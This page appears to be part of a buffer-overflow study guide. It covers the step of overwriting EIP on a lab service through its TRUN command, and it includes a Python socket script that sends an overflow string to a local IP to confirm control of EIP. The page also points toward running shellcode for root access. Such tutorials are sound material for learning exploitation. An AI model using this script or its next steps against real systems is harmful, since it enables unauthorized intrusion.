Overwriting the EIP

PRACTICE ! PRACTICE ! PRACTICE !

Let's now overwrite the EIP which is 4 bytes long - To confirm this we'll add a specific char which is "B" in this case just to confirm that we've overwritten the EIP

#!/usr/bin/python

import sys, socket

shellcode = "A" * 2003 + "B" *4

try:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect(('192.168.0.104',9999))

	s.send(('TRUN /.:/' + shellcode))
	s.close()

except:

	print("Error !")
	sys.exit()

  • We are declaring a variable called shellcode and we are feeding it a 2003 A's - So that we fill up till the buffer space and the EBP

  • And then fill the EIP using the character B (0x42)

So it's confirmed that we are on the right path and we've overwritten the EIP with 42424242

  • We now have the control over the EIP register and from now it's easy to point the program to a malicious shellcode and get R00T

PreviousFinding the OffsetNextFinding BAD Characters

Last updated